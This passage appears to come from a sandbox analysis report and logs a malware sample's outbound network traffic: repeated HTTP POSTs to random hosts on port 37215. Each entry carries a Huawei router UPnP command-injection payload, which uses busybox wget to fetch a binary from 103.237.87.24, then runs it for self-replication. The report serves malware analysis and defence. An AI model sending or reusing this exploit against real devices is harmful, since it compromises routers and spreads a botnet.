3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1225192.168.2.134946041.44.84.21637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.448026896 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1226192.168.2.133592441.255.214.14737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.448043108 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1227192.168.2.135431898.61.93.19737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.448055983 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1228192.168.2.1338310205.131.186.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.448262930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1229192.168.2.1351962157.193.63.4037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.448287964 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1230192.168.2.1358204157.207.224.8837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.448287964 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1231192.168.2.133651041.236.47.11337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.448309898 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1232192.168.2.136056457.45.118.7537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.448676109 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1233192.168.2.133788441.197.151.14437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.448678970 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1234192.168.2.134044641.227.207.10237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.448688984 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1235192.168.2.135816441.95.178.4737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.448707104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
